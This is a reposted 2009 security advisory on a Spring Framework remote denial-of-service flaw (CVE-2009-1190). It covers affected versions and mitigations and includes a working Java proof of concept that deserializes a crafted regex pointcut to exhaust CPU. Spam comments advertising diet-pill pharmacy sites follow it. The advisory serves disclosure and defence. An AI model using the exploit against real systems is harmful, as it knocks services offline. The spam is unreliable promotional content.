Home » 2009 » April » 27 » CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability
10:11 AM
CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability
Hash: SHA1

CVE-2009-1190: Spring Framework Remote Denial of Service Vulnerability

Severity: Low

Vendor: SpringSource

Versions Affected:
Spring Framework 1.1.0-2.5.6, 3.0.0.M1-3.0.0.M2
dm Server 1.0.0-1.0.2 (note 2.x not affected since dm Server 2.x requires a 1.6 JDK)

Description:
The j.u.r.Pattern.compile method in Sun 1.5 JDK has a problem ([1],[2]) with exponential compilation times, when using optional groups. A workaround [3] was implemented in 1.4.2_06 but the root cause of poor performance in regex processing was not resolved until JDK 1.6.
JdkRegexpMethodPointcut calls Pattern.compile(source[i]); via it's inherited readObject method (from AbstractRegexpMethodPointcut). When Sun JVM 1.5 driven application with spring.jar in its classpath accepts serializable data, an attacker could use a long regex string with many optional groups to consume enormous CPU resources. And, with a few requests all listeners will be occupied with compiling regex expressions forever.

Mitigation:
* Users of all products may upgrade to JRE/JDK 1.6 which includes the fix for the root cause
* Spring Framework 2.5.6.SEC01 has been released for Community users that includes a workaround to the root cause - see[4] for upgrade steps
* Spring Framework 2.5.6.SR02 is available for Enterprise users that includes a workaround to the root cause; The software can be found in the Customer Portal [5]
* Disable functionality that accepts serializable data from untrusted sources
* Spring Framework 3.0.0.M3 will be released shortly that includes a workaround to the root cause
* dm Server 1.0.2 Community users may replace the Spring Framework 2.5.6 jar with 2.5.6.SEC01 - see[4] for upgrade steps
* dm Server 1.0.3 that includes a workaround to the root cause will be released shortly
* Instrumented Spring Framework 2.5.6.SR02 that includes a workaround to the root cause will be released by April 27, 2009

Example:
public class DoSSpring {

 static byte[] getSerialized(Object o) throws Exception {
 ByteArrayOutputStream baos = new ByteArrayOutputStream();
 ObjectOutputStream oos = new ObjectOutputStream(baos);
 oos.writeObject(o);
 oos.flush();
 oos.close();
 return baos.toByteArray();
 }

 public static void main(String[] a) throws Exception{
 String thePattern="(Y)?(K)?(W)?(I)?(
U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)" +
     "?(K)?(W)?(I)?(U)?(G)?(S)?(E)?(Q)?(C)?(O)?(A)?(M)?(Y)?(K)" +
     "?(W)?(I)?(U)?(a)?$";
 String longerPattern = thePattern.substring(0,thePattern.length()-1)+thePattern;
 int length = longerPattern.length();
 String fakePattern = longerPattern.replaceAll(".", "A");
 JdkRegexpMethodPointcut jrmp = new JdkRegexpMethodPointcut();
 jrmp.setPattern(fakePattern);
 System.out.println(jrmp);
 byte[] theArray = getSerialized(jrmp);
 int i = 0;
 for (; i < theArray.length;i++) {
  if (((char)theArray[i])=='A' &&((char)theArray[i+1]=='A')) {
   break;
  }
 }
 System.arraycopy(longerPattern.getBytes(), 0, theArray, i, length);

 ByteArrayInputStream bis = new ByteArrayInputStream(theArray);
 ObjectInputStream ois = new ObjectInputStream(bis);
 Object o = ois.readObject(); // returns after a very very long time

 }
}

Credit:
This issue was discovered by the RedHat Security Response Team

References:
[1] http://www.packetstormsecurity.org/hitb06/DAY_1_-_Marc_Schoenefeld_-_Pentesting_Java_J2EE.pdf
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2540
[3] http://archive.cert.uni-stuttgart.de/uniras/2005/01/msg00035.html
[4] http://www.springsource.com/securityadvisory
[5] http://www.springsource.com/spring_account_file
-----BEGIN PGP SIGNATURE-----
Views: 11502 | Added by: Siegh_Wahrhreit | Rating: 0.0/0
Total comments: 6
0
6 air max nike   [Entry]
My mom used to do the half truth trick so me and my sisters will eat healthier. Now, I鈥檓 doing the same thing for my son although lately he is eating fruits and veggies. He even request that we make him lunch and snacks for school. Thanks for sharing a very helpful post and yes, another delicious recipe. Best wishes to you and your family.

0
5 air max nike   [Entry]
Hey! Keep it up your work. Your blog and post are very informative. Very clear easy to understand text I am enjoying your post. Please take a look at my dissertation services site and advise me further improvement.

0
4 ViaceattOrife   [Entry]
http://allidietpillstore.com/#8924 allidietpillstore.com

0
3 Vietroxyvorry   [Entry]
http://allidietpillsph.com/#5876 Alli [url=http://allidietpillsph.com/#5649]best weight loss drugs

0
2 Outsivivy   [Entry]
http://allidietpillspharm.com/#7061 alli weight loss reviews [url=http://allidietpillspharm.com/#5549]alli weight loss pills

0
1 SpoociolI   [Entry]
http://alliorlistatdietpills.com/#8149 buy alli online [url=http://alliorlistatdietpills.com/#8625]alli weight loss

Name *:
Email *:
Code *: